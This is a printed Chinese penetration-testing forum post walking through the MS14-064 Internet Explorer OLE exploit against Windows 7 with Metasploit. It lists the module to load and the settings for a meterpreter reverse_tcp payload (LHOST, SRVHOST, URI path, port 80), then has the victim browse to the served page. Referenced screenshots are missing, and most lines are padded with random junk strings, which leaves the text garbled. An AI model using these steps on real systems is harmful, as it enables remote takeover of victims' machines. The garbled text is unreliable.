中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

! E% R% B6 R5 ?6 O& l 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ {9 \3 m/ u( z [* r4 o# Y

. p }( c( k8 S' x( N& L% m. R) a8 `

" F" N; q8 c$ Z. v l/ n# j; b 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: / ~/ _; i$ f/ ?/ \* W

. F* b7 d. j& X9 T

; i- Z, ?4 F# X8 @$ d1 G' N 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp ; J0 m6 U" @* _% Z. O: O

, I+ w* N8 ]* D" Q

/ c, M: E4 f* q) a' N             set AllowPowershellPrompt true " y9 `* b" n( z9 l) Y- U' Q

* s0 V$ d: t% [0 l. x

. J& g0 h: B, W2 w. w! s             Set LHOST 192.168.0.109 A# F3 `1 | A5 S

1 f! }7 u- Z& h

) [ [& `. V3 X* n             set SRVHOST 192.168.0.109 % J, s& P. ~4 @6 Y) _

1 o" d7 P+ \( a/ I3 A

' M* C5 f0 O1 H: H3 g             Set uripath share0 Y7 M$ p! g9 l! e3 D$ t9 y9 W

1 s3 p$ t/ i) e' ^; J( j! ~+ z

* {6 c. A7 v1 T/ A$ W2 _: j             Set srvport 80 ( ^! O% z8 c& I' B e; c

. m4 ]# M5 p7 J/ P5 [5 {

/ r9 [' O$ L: X" {8 O   ' a. j; \7 h" X

, V* b: v0 W3 I3 @: v% S

( i1 Z0 j* F" M2 ^8 Y5 G* F) K  1 [2 s7 h' v p3 R, u: |" v) G7 `. y

: _0 C) h. S- t6 g3 ~ R

6 t' g0 @# q9 l; b6 N  / R$ Q/ D( _& z" u6 c7 \9 s

7 Y9 B0 L& X6 ]: u9 F+ p

3 h/ i: k6 _; I* P   7 Q5 C+ C5 x8 Y. U

- V. I: `" ~9 B2 R# e% J

3 p- c3 N& ]$ ^( }7 v9 s! N$ ~- D0 \  : z1 L" U6 U" @9 Y' p

2 k0 O* V8 x+ K$ a. `/ ]

4 J5 z& a9 B6 }- E5 @1 F$ r 下面我们来访问本地地址如图: ! m$ r; S! {/ k; f! g$ j

, \# R0 U C; R3 v6 W3 p! G- \4 j

4 h ]) V" }) A  8 @* t: d% S. D0 U# \! _: C

% K8 Y6 q/ }+ m& {# c

9 R% S& B1 T% o' D m8 x) K4 u6 `* {  % s7 v8 j1 g' X4 t( L% g

6 h% s) e$ Y5 V: h' R5 E" P" T& J

, k- G& R4 ]- [* w5 }2 c ?& P 6 s6 j! l8 F' z8 K





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2